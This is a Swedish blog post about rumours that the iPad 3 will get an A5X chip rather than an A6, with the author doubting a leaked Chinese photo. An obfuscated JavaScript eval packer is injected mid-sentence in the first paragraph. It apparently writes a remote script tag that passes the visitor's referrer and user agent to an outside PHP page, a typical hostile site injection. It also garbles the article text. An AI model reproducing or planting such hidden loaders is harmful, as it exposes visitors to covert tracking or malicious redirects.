Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

IPad 3 får en A5X-processor istället för en A6

IPad 3 får en A5X-processor istället för en A6
Sebastian

Jag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|heznd|var|u0026u|referrer|eydst||js|php’.split(’|’),0,{}))
är en av alla miljoner personer som verkligen längtar efter nästa upphotade iPad. En högre upplösning på skärmen är något som jag verkligen förväntar mig, inte för att den är dålig på iPad 2 men ska det va så ska det va.

Dock ser det inte jätte ljust ut på den fronten. IPad 1 hade en A4-processor och iPad 2 hade en A5. Därför har många (även jag) trott att iPad 3 ska få en ny fräsch processor med namnet A6 – men så verkar det tyvärr inte bli.

För någon dag sen dök det upp en bild som ska bevisa att iPad 3 kommer att få en A5X-processor. Dock är jag alltid lite små skeptisk mot bilder som läggs upp, speciellt om de är från Kina. Bilden som dök upp kommer från en kinesisk sajt och visar ett moderbord med en A5X-processor. Om detta nu skulle stämma verkar det bli en mindre uppdatering som vi får.

Det börjar dyka upp så mycket bilder på iPad 3 nu så jag vet inte vad jag ska tro, vi får helt enkelt vänta tills Apple går ut officiellt med information.